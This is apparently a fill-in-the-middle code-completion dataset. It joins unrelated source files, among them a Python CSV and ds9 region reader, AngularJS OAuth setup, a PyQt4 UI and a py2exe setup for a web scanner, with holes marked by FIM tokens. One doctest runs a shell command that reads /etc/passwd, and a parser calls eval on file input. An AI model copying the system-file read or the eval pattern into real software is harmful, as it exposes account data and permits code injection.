dict_from_csv( filename, fieldnames, ...) -> {}
To each column data read from 'filename' is given the respective 'fieldnames' entry.
(So that is expected that len(filednames) == #filename-columns)
It is expected that the first lines of the CSV file are header lines (comments). The
amount of header lines to avoid reading is given through 'header_lines'. 'delimiter'
specifies the field separators and 'dialect' is the CSV pattern used.
Use 'header_lines' to remove non-data lines from the head of the
file. Header lines are taken as comments and are not read.
Input:
- filename str : Name of csv catalog to read
- fieldnames [str] : Fieldnames to be read from catalog
- header_lines int : Number of lines to remove from the head of 'filename'
- delimiter str : Delimiter to use between columns in 'filename'
- dialect str : CSV file fine structure (See help(csv) for more info)
Output:
- {*fieldnames}
Example:
# >>> import os
# >>> os.system('grep -v "^#" /etc/passwd | head -n 3 > test.asc')
# 0
# >>> s = os.system('cat test.asc')
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
>>>
>>> D = dict_from_csv('test.asc',['user','star'],delimiter=':',header_lines=0)
>>>
---
"""
# Initialize output dictionary
Dout = {};
for k in fieldnames:
Dout[k] = [];
#Initialize csv reader
catFile = open(filename,'r');
lixo_head = [ catFile.next() for i in range(header_lines) ];
catObj = csv.DictReader(catFile,fieldnames,delimiter=delimiter,dialect=dialect);
for row in catObj:
for k in fieldnames:
Dout[k].append(row[k]);
return Dout;
# ---
def write_ds9cat(x,y,size=20,marker='circle',color='red',outputfile='ds9.reg',filename='None'):
"""
Function to write a ds9 region file given a set of centroids
It works only with a circular 'marker' with fixed
radius for all (x,y) - 'centroids' - given.
Input:
- x : int | []
X-axis points
- y : int | []
Y-axis points
- size : int | []
- marker : str | [str]
- outputfile : str | [str]
Output:
<bool>
Example:
>>> write_ds9cat(x=100,y=100,outputfile='test.reg')
>>>
>>> import os
>>> s = os.system('cat test.reg')
# Region file format: DS9 version 4.1
# Filename: None
global color=green dashlist=8 3 width=1 font="helvetica 10 normal" select=1 highlite=1 dash=0 fixed=0 edit=1 move=1 delete=1 include=1 source=1
image
circle(100,100,20) # color=red
>>>
>>>
>>>
>>> write_ds9cat(x=[1,2],y=[0,3],outputfile='test.reg',size=[10,15],marker=['circle','box'])
>>>
>>> s = os.system('cat test.reg')
# Region file format: DS9 version 4.1
# Filename: None
global color=green dashlist=8 3 width=1 font="helvetica 10 normal" select=1 highlite=1 dash=0 fixed=0 edit=1 move=1 delete=1 include=1 source=1
image
circle(1,0,10) # color=red
box(2,3,15,15,0) # color=red
>>>
"""
try:
if len(x) != len(y):
sys.stderr.write("X and Y lengths do not math. Check their sizes.")
return False;
except:
x = [x];
y = [y];
centroids = zip(x,y);
length = len(centroids);
# Lets verify if everyone here is a list/tuple:
#
try:
len(size);
except TypeError:
size = [size];
_diff = max(0,length-len(size))
if _diff:
size.extend([ size[-1] for i in range(0,_diff+1) ]);
#
if type(marker) == type(str()):
marker = [marker];
_diff = max(0,length-len(marker))
if _diff:
marker.extend([ marker[-1] for i in range(0,_diff+1) ]);
#
if type(color) == type(str()):
color = [color];
_diff = max(0,length-len(color))
if _diff:
color.extend([ color[-1] for i in range(0,_diff+1) ]);
output = open(outputfile,'w');
# DS9 region file header
output.write("# Region file format: DS9 version 4.1\n");
output.write("# Filename: %s\n" % (filename));
output.write("global color=green dashlist=8 3 width=1 font=\"helvetica 10 normal\" ");
output.write("select=1 highlite=1 dash=0 fixed=0 edit=1 move=1 delete=1 include=1 source=1\n");
output.write("image\n");
for i in range(length):
if marker[i] == 'circle':
output.write("circle(%s,%s,%s) # color=%s\n" % (x[i],y[i],size[i],color[i]));
elif marker[i] == 'box':
output.write("box(%s,%s,%s,%s,0) # color=%s\n" % (x[i],y[i],size[i],size[i],color[i]));
output.close();
return
# ---
def read_ds9cat(regionfile):
""" Function to read ds9 region file
Only regions marked with a 'circle' or 'box' are read.
'color' used for region marks (circle/box) are given as
output together with 'x','y','dx','dy' as list in a
dictionary. The key 'image' in the output (<dict>) gives
the filename in the 'regionfile'.
Input:
- regionfile : ASCII (ds9 format) file
Output:
-> {'image':str,'x':[],'y':[],'size':[],'marker':[],'color':[]}
Example:
>>> write_ds9cat(x=[1,2],y=[0,3],outputfile='test.reg',size=[10,15])
>>>
>>> D = read_ds9cat('test.reg')
>>>
"""
D_out = {'filename':'', 'marker':[], 'color':[], 'x':[], 'y':[], 'size':[]};
fp = open(regionfile,'r');
for line in fp.readlines():
if (re.search("^#",line)):
if (re.search("Filename",line)):
imagename = string.split(line,"/")[-1];
D_out['filename'] = re.sub("# Filename: ","",imagename).rstrip('\n');
continue;
else:
try:
_cl = re.search('(?<=color\=).*',line).group();
color = string.split(_cl)[0];
except AttributeError:
pass;
if re.search("circle",line) or re.search("box",line):
marker = string.split(line,"(")[0];
else:
continue;
try:
_fg = re.sub("\)","",re.search('(?<=box\().*\)',line).group());
x,y,dx,dy = string.split(_fg,sep=",")[:4];
D_out['x'].append(eval(x));
D_out['y'].append(eval(y));
D_out['size'].append(max(eval(dx),eval(dy)));
D_out['color'].append(color);
D_out['marker'].append(marker);
continue;
except AttributeError:
pass;
try:
_fg = re.sub("\)","",re.search('(?<=circle\().*\)',line).group());
x,y,R = string.split(_fg,sep=",")[:3];
D_out['x'].append(eval(x));
D_out['y'].append(eval(y));
D_out['size'].append(eval(R));
D_out['color'].append(color);
D_out['marker'].append(marker);
continue;
except AttributeError:
pass;
fp.close();
return D_out;
# ---
if __name__ == "__main__":
import doctest;
doctest.testmod()<|fim▁end|> |
""" |
<|file_name|>less.py<|end_file_name|><|fim▁begin|>import os.path
from pipeline.conf import settings
from pipeline.compilers import SubProcessCompiler
class LessCompiler(SubProcessCompiler):
output_extension = 'css'
def match_file(self, filename):
return filename.endswith('.less')
<|fim▁hole|> command = '%s %s %s' % (
settings.PIPELINE_LESS_BINARY,
settings.PIPELINE_LESS_ARGUMENTS,
path
)
cwd = os.path.dirname(path)
content = self.execute_command(command, cwd=cwd)
return content<|fim▁end|> | def compile_file(self, content, path): |
<|file_name|>app.js<|end_file_name|><|fim▁begin|>'use strict';
/**
* @ngdoc object
* @name activityApp
* @requires $routeProvider
* @requires activityControllers
* @requires ui.bootstrap
*
* @description
* Root app, which routes and specifies the partial html and controller depending on the url requested.
*
*/
var app = angular.module('activityApp',
['activityControllers', 'ngRoute', 'ui.bootstrap', 'ui.bootstrap.datetimepicker']).
config(['$routeProvider',
function ($routeProvider) {
$routeProvider.
when('/activity', {
templateUrl: '/partials/show_activities.html',
controller: 'ShowActivityCtrl'
}).
when('/activity/create', {
templateUrl: '/partials/create_activities.html',
controller: 'CreateActivityCtrl'
}).
when('/activity/detail/:websafeActivityKey', {
templateUrl: '/partials/activity_detail.html',
controller: 'ActivityDetailCtrl'
}).
when('/profile', {
templateUrl: '/partials/profile.html',
controller: 'MyProfileCtrl'
}).
when('/', {
templateUrl: '/partials/home.html'
}).
otherwise({
redirectTo: '/'
});
}]);
/**
* @ngdoc filter
* @name startFrom
*
* @description
* A filter that extracts an array from the specific index.
*
*/
app.filter('startFrom', function () {
/**
* Extracts an array from the specific index.
*
* @param {Array} data
* @param {Integer} start
* @returns {Array|*}
*/
var filter = function (data, start) {
return data.slice(start);
}
return filter;
});
/**
* @ngdoc constant
* @name HTTP_ERRORS
*
* @description
* Holds the constants that represent HTTP error codes.<|fim▁hole|> 'UNAUTHORIZED': 401
});
/**
* @ngdoc service
* @name oauth2Provider
*
* @description
* Service that holds the OAuth2 information shared across all the pages.
*
*/
app.factory('oauth2Provider', function ($modal) {
var oauth2Provider = {
CLIENT_ID: '411586073540-cq6ialm9aojdtjts6f12bb68up7k04t1.apps.googleusercontent.com',
SCOPES: 'https://www.googleapis.com/auth/userinfo.email profile',
signedIn: false
};
/**
* Calls the OAuth2 authentication method.
*/
oauth2Provider.signIn = function (callback) {
gapi.auth.signIn({
'clientid': oauth2Provider.CLIENT_ID,
'cookiepolicy': 'single_host_origin',
'accesstype': 'online',
'approveprompt': 'auto',
'scope': oauth2Provider.SCOPES,
'callback': callback
});
};
/**
* Logs out the user.
*/
oauth2Provider.signOut = function () {
gapi.auth.signOut();
// Explicitly set the invalid access token in order to make the API calls fail.
gapi.auth.setToken({access_token: ''});
oauth2Provider.signedIn = false;
};
/**
* Shows the modal with Google+ sign in button.
*
* @returns {*|Window}
*/
oauth2Provider.showLoginModal = function() {
var modalInstance = $modal.open({
templateUrl: '/partials/login.modal.html',
controller: 'OAuth2LoginModalCtrl'
});
return modalInstance;
};
return oauth2Provider;
});<|fim▁end|> | *
*/
app.constant('HTTP_ERRORS', { |
<|file_name|>TooManyRequestException.ts<|end_file_name|><|fim▁begin|>/// <reference path="../../../node.d.ts" />
export = TooManyRequestException;
import HttpServiceUnavailableException = require('../../errors/HttpServiceUnavailableException');
'use strict';
/**
* 要求を受け付けできません。リクエストの密度が高すぎます。
*/
class TooManyRequestException extends HttpServiceUnavailableException {
/**
* @constructor
* @public
* @param {number} status
* @param {string} code=null
* @param {string} message=""
*/<|fim▁hole|> constructor(status:number, code:string=null, message:string="") {
super(status, code, message == null || message == "" ? "要求を受け付けできません。リクエストの密度が高すぎます。" : message);
}
}<|fim▁end|> | |
<|file_name|>account.routing.ts<|end_file_name|><|fim▁begin|>import {Routes, RouterModule} from '@angular/router';
import {LoginPageComponent} from './components/login-page/login-page.component';
import {RegisterPageComponent} from './components/register-page/register-page.component';
const accountRoutes:Routes = [{
path: 'login',
component: LoginPageComponent
}, {
path: 'register',<|fim▁hole|><|fim▁end|> | component: RegisterPageComponent
}];
export const accountRouting = RouterModule.forChild(accountRoutes); |
<|file_name|>hipDeviceGetAttribute.cpp<|end_file_name|><|fim▁begin|>/*
Copyright (c) 2015 - 2021 Advanced Micro Devices, Inc. All rights reserved.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:<|fim▁hole|>The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
*/
#include <hip/hip_runtime_api.h>
#include "test_common.h"
int main() {
int val;
hipDeviceAttribute_t attr =
hipDeviceAttributeMaxThreadsPerBlock; ///< Maximum number of threads per block.
HIP_PRINT_STATUS(hipDeviceGetAttribute(NULL, attr, 0));
HIP_PRINT_STATUS(hipDeviceGetAttribute(&val, attr, 0));
HIP_PRINT_STATUS(hipDeviceGetAttribute(NULL, attr, -1));
HIP_PRINT_STATUS(hipDeviceGetAttribute(&val, attr, -1));
attr = hipDeviceAttribute_t(91);
HIP_PRINT_STATUS(hipDeviceGetAttribute(NULL, attr, 0));
HIP_PRINT_STATUS(hipDeviceGetAttribute(&val, attr, 0));
HIP_PRINT_STATUS(hipDeviceGetAttribute(NULL, attr, -1));
HIP_PRINT_STATUS(hipDeviceGetAttribute(&val, attr, -1));
}<|fim▁end|> | |
<|file_name|>mainwindow_ui.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'src/ui/mainwindow.ui'
#
# Created: Fri Feb 15 16:08:54 2013
# by: PyQt4 UI code generator 4.9.3
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(1024, 768)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setEnabled(True)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.centralwidget.sizePolicy().hasHeightForWidth())
self.centralwidget.setSizePolicy(sizePolicy)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.verticalLayout = QtGui.QVBoxLayout(self.centralwidget)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.horizontalLayout_2 = QtGui.QHBoxLayout()
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
self.label_3 = QtGui.QLabel(self.centralwidget)
self.label_3.setMaximumSize(QtCore.QSize(200, 200))
self.label_3.setText(_fromUtf8(""))
self.label_3.setPixmap(QtGui.QPixmap(_fromUtf8(":/logo/pixmaps/logo.jpg")))
self.label_3.setScaledContents(True)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.horizontalLayout_2.addWidget(self.label_3)
self.verticalLayout_2 = QtGui.QVBoxLayout()
self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
self.label_2 = QtGui.QLabel(self.centralwidget)
font = QtGui.QFont()
font.setPointSize(20)
self.label_2.setFont(font)
self.label_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.verticalLayout_2.addWidget(self.label_2)
self.labelServerId = QtGui.QLabel(self.centralwidget)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(118, 116, 113))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(118, 116, 113))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
self.labelServerId.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(True)
font.setWeight(75)
self.labelServerId.setFont(font)
self.labelServerId.setAlignment(QtCore.Qt.AlignCenter)
self.labelServerId.setObjectName(_fromUtf8("labelServerId"))
self.verticalLayout_2.addWidget(self.labelServerId)
self.labelYear = QtGui.QLabel(self.centralwidget)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(118, 116, 113))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
self.labelYear.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(37)
font.setBold(True)
font.setWeight(75)
self.labelYear.setFont(font)
self.labelYear.setTextFormat(QtCore.Qt.PlainText)
self.labelYear.setAlignment(QtCore.Qt.AlignCenter)
self.labelYear.setObjectName(_fromUtf8("labelYear"))
self.verticalLayout_2.addWidget(self.labelYear)
self.horizontalLayout_2.addLayout(self.verticalLayout_2)
self.label = QtGui.QLabel(self.centralwidget)
self.label.setMaximumSize(QtCore.QSize(200, 200))
self.label.setText(_fromUtf8(""))
self.label.setPixmap(QtGui.QPixmap(_fromUtf8(":/logo/pixmaps/Stampa-silicone-tondo-fi55.png")))
self.label.setScaledContents(True)
self.label.setObjectName(_fromUtf8("label"))
self.horizontalLayout_2.addWidget(self.label)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.line = QtGui.QFrame(self.centralwidget)
self.line.setFrameShadow(QtGui.QFrame.Raised)
self.line.setLineWidth(4)
self.line.setFrameShape(QtGui.QFrame.HLine)
self.line.setFrameShadow(QtGui.QFrame.Sunken)
self.line.setObjectName(_fromUtf8("line"))
self.verticalLayout.addWidget(self.line)
spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.btnNewYear = QtGui.QToolButton(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(11)
sizePolicy.setHeightForWidth(self.btnNewYear.sizePolicy().hasHeightForWidth())
self.btnNewYear.setSizePolicy(sizePolicy)
self.btnNewYear.setMinimumSize(QtCore.QSize(0, 200))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.btnNewYear.setFont(font)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/img/pixmaps/planner.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.btnNewYear.setIcon(icon)
self.btnNewYear.setIconSize(QtCore.QSize(128, 128))
self.btnNewYear.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)
self.btnNewYear.setAutoRaise(False)
self.btnNewYear.setArrowType(QtCore.Qt.NoArrow)
self.btnNewYear.setObjectName(_fromUtf8("btnNewYear"))
self.horizontalLayout.addWidget(self.btnNewYear)
self.btnCloseYear = QtGui.QToolButton(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(11)
sizePolicy.setHeightForWidth(self.btnCloseYear.sizePolicy().hasHeightForWidth())
self.btnCloseYear.setSizePolicy(sizePolicy)
self.btnCloseYear.setMinimumSize(QtCore.QSize(0, 200))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.btnCloseYear.setFont(font)
self.btnCloseYear.setAutoFillBackground(False)
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap(_fromUtf8(":/img/pixmaps/save.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.btnCloseYear.setIcon(icon1)
self.btnCloseYear.setIconSize(QtCore.QSize(128, 128))
self.btnCloseYear.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)
self.btnCloseYear.setObjectName(_fromUtf8("btnCloseYear"))
self.horizontalLayout.addWidget(self.btnCloseYear)
self.btnTeachers = QtGui.QToolButton(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(11)
sizePolicy.setHeightForWidth(self.btnTeachers.sizePolicy().hasHeightForWidth())
self.btnTeachers.setSizePolicy(sizePolicy)
self.btnTeachers.setMinimumSize(QtCore.QSize(0, 200))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.btnTeachers.setFont(font)
icon2 = QtGui.QIcon()
icon2.addPixmap(QtGui.QPixmap(_fromUtf8(":/img/pixmaps/education.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.btnTeachers.setIcon(icon2)
self.btnTeachers.setIconSize(QtCore.QSize(128, 128))
self.btnTeachers.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)
self.btnTeachers.setObjectName(_fromUtf8("btnTeachers"))
self.horizontalLayout.addWidget(self.btnTeachers)
self.btnStudents = QtGui.QToolButton(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(11)
sizePolicy.setHeightForWidth(self.btnStudents.sizePolicy().hasHeightForWidth())
self.btnStudents.setSizePolicy(sizePolicy)
self.btnStudents.setMinimumSize(QtCore.QSize(0, 200))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.btnStudents.setFont(font)
self.btnStudents.setStyleSheet(_fromUtf8(""))
icon3 = QtGui.QIcon()
icon3.addPixmap(QtGui.QPixmap(_fromUtf8(":/img/pixmaps/System-users.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.btnStudents.setIcon(icon3)
self.btnStudents.setIconSize(QtCore.QSize(128, 128))
self.btnStudents.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)
self.btnStudents.setObjectName(_fromUtf8("btnStudents"))
self.horizontalLayout.addWidget(self.btnStudents)
self.btnAdvanced = QtGui.QToolButton(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(11)
sizePolicy.setHeightForWidth(self.btnAdvanced.sizePolicy().hasHeightForWidth())
self.btnAdvanced.setSizePolicy(sizePolicy)
self.btnAdvanced.setMinimumSize(QtCore.QSize(0, 200))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.btnAdvanced.setFont(font)<|fim▁hole|> icon4.addPixmap(QtGui.QPixmap(_fromUtf8(":/img/pixmaps/advanced_options.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.btnAdvanced.setIcon(icon4)
self.btnAdvanced.setIconSize(QtCore.QSize(128, 128))
self.btnAdvanced.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)
self.btnAdvanced.setObjectName(_fromUtf8("btnAdvanced"))
self.horizontalLayout.addWidget(self.btnAdvanced)
self.verticalLayout.addLayout(self.horizontalLayout)
spacerItem1 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem1)
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1024, 29))
self.menubar.setObjectName(_fromUtf8("menubar"))
self.menuImpostazioni = QtGui.QMenu(self.menubar)
self.menuImpostazioni.setEnabled(False)
self.menuImpostazioni.setObjectName(_fromUtf8("menuImpostazioni"))
self.menuHelp = QtGui.QMenu(self.menubar)
self.menuHelp.setEnabled(False)
self.menuHelp.setObjectName(_fromUtf8("menuHelp"))
self.menuArchivi = QtGui.QMenu(self.menubar)
self.menuArchivi.setObjectName(_fromUtf8("menuArchivi"))
MainWindow.setMenuBar(self.menubar)
self.actionAbout = QtGui.QAction(MainWindow)
self.actionAbout.setObjectName(_fromUtf8("actionAbout"))
self.actionPreferenze = QtGui.QAction(MainWindow)
self.actionPreferenze.setObjectName(_fromUtf8("actionPreferenze"))
self.actionArchivioAnniPrec = QtGui.QAction(MainWindow)
self.actionArchivioAnniPrec.setObjectName(_fromUtf8("actionArchivioAnniPrec"))
self.menuImpostazioni.addAction(self.actionPreferenze)
self.menuHelp.addAction(self.actionAbout)
self.menuArchivi.addAction(self.actionArchivioAnniPrec)
self.menubar.addAction(self.menuArchivi.menuAction())
self.menubar.addAction(self.menuImpostazioni.menuAction())
self.menubar.addAction(self.menuHelp.menuAction())
self.retranslateUi(MainWindow)
QtCore.QObject.connect(self.btnAdvanced, QtCore.SIGNAL(_fromUtf8("clicked()")), MainWindow.execAdvancedUserManager)
QtCore.QObject.connect(self.btnCloseYear, QtCore.SIGNAL(_fromUtf8("clicked()")), MainWindow.execYearEnd)
QtCore.QObject.connect(self.btnNewYear, QtCore.SIGNAL(_fromUtf8("clicked()")), MainWindow.execYearNew)
QtCore.QObject.connect(self.actionArchivioAnniPrec, QtCore.SIGNAL(_fromUtf8("triggered()")), MainWindow.showArchBackup)
QtCore.QObject.connect(self.btnStudents, QtCore.SIGNAL(_fromUtf8("clicked()")), MainWindow.showStudentsManager)
QtCore.QObject.connect(self.btnTeachers, QtCore.SIGNAL(_fromUtf8("clicked()")), MainWindow.showTeachersManager)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(QtGui.QApplication.translate("MainWindow", "MainWindow", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(QtGui.QApplication.translate("MainWindow", "Pannello di Amministrazione del Server", None, QtGui.QApplication.UnicodeUTF8))
self.labelServerId.setText(QtGui.QApplication.translate("MainWindow", "TextLabel", None, QtGui.QApplication.UnicodeUTF8))
self.labelYear.setText(QtGui.QApplication.translate("MainWindow", "Anno -", None, QtGui.QApplication.UnicodeUTF8))
self.btnNewYear.setText(QtGui.QApplication.translate("MainWindow", "Nuovo Anno", None, QtGui.QApplication.UnicodeUTF8))
self.btnCloseYear.setText(QtGui.QApplication.translate("MainWindow", "Chiusura Anno", None, QtGui.QApplication.UnicodeUTF8))
self.btnTeachers.setText(QtGui.QApplication.translate("MainWindow", "Gestione Insegnanti", None, QtGui.QApplication.UnicodeUTF8))
self.btnStudents.setText(QtGui.QApplication.translate("MainWindow", "Gestione Alunni", None, QtGui.QApplication.UnicodeUTF8))
self.btnAdvanced.setText(QtGui.QApplication.translate("MainWindow", "Gestione Avanzata", None, QtGui.QApplication.UnicodeUTF8))
self.menuImpostazioni.setTitle(QtGui.QApplication.translate("MainWindow", "Impostazioni", None, QtGui.QApplication.UnicodeUTF8))
self.menuHelp.setTitle(QtGui.QApplication.translate("MainWindow", "Help", None, QtGui.QApplication.UnicodeUTF8))
self.menuArchivi.setTitle(QtGui.QApplication.translate("MainWindow", "Archivi", None, QtGui.QApplication.UnicodeUTF8))
self.actionAbout.setText(QtGui.QApplication.translate("MainWindow", "About", None, QtGui.QApplication.UnicodeUTF8))
self.actionPreferenze.setText(QtGui.QApplication.translate("MainWindow", "Preferenze", None, QtGui.QApplication.UnicodeUTF8))
self.actionArchivioAnniPrec.setText(QtGui.QApplication.translate("MainWindow", "Archivio anni precedenti", None, QtGui.QApplication.UnicodeUTF8))
import classerman_rc<|fim▁end|> | icon4 = QtGui.QIcon() |
<|file_name|>winsetup.py<|end_file_name|><|fim▁begin|>from distutils.core import setup
import py2exe
opts = {
"py2exe": {
"compressed": 1,
"optimize": 2,
"ascii": 1,
"bundle_files": 1,
"packages": ["encodings"],
"dist_dir": "dist"
}
}
setup (name = "Gomoz",
fullname = "Gomoz web scanner",
version = "1.0.1",
description = "Gomoz scanner web application",<|fim▁hole|> license = "GPL",
keywords = ["scanner", "web application", "securfox", "wxPython"],
windows = [{"script": "gomoz"}],
options = opts,
zipfile = None
)<|fim▁end|> | author = "Handrix",
author_email = "[email protected]",
url = "http://www.sourceforge.net/projects/gomoz/", |
<|file_name|>ScheduleCreateInput.java<|end_file_name|><|fim▁begin|>/*
* Copyright 2015-2018 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.pivotal.strepsirrhini.chaosloris.web;
import com.fasterxml.jackson.annotation.JsonCreator;
import com.fasterxml.jackson.annotation.JsonProperty;
import javax.validation.constraints.NotNull;
/**
* Input for schedule creation<|fim▁hole|>
@NotNull
private final String expression;
@NotNull
private final String name;
@JsonCreator
ScheduleCreateInput(@JsonProperty("expression") String expression, @JsonProperty("name") String name) {
this.expression = expression;
this.name = name;
}
String getExpression() {
return this.expression;
}
String getName() {
return this.name;
}
}<|fim▁end|> | */
public final class ScheduleCreateInput { |
<|file_name|>alias.py<|end_file_name|><|fim▁begin|>import numpy as np
from scipy.sparse import csr_matrix
class AliasArray(np.ndarray):
"""An ndarray with a mapping of values to user-friendly names -- see example
This ndarray subclass enables comparing sub_id and hop_id arrays directly with
their friendly string identifiers. The mapping parameter translates sublattice
or hopping names into their number IDs.
Only the `==` and `!=` operators are overloaded to handle the aliases.
Examples
--------
>>> a = AliasArray([0, 1, 0], mapping={"A": 0, "B": 1})
>>> list(a == 0)
[True, False, True]
>>> list(a == "A")
[True, False, True]
>>> list(a != "A")
[False, True, False]
>>> a = AliasArray([0, 1, 0, 2], mapping={"A|1": 0, "B": 1, "A|2": 2})
>>> list(a == "A")
[True, False, True, True]
>>> list(a != "A")
[False, True, False, False]
"""
def __new__(cls, array, mapping):
obj = np.asarray(array).view(cls)
obj.mapping = {SplitName(k): v for k, v in mapping.items()}
return obj
def __array_finalize__(self, obj):
if obj is None:
return
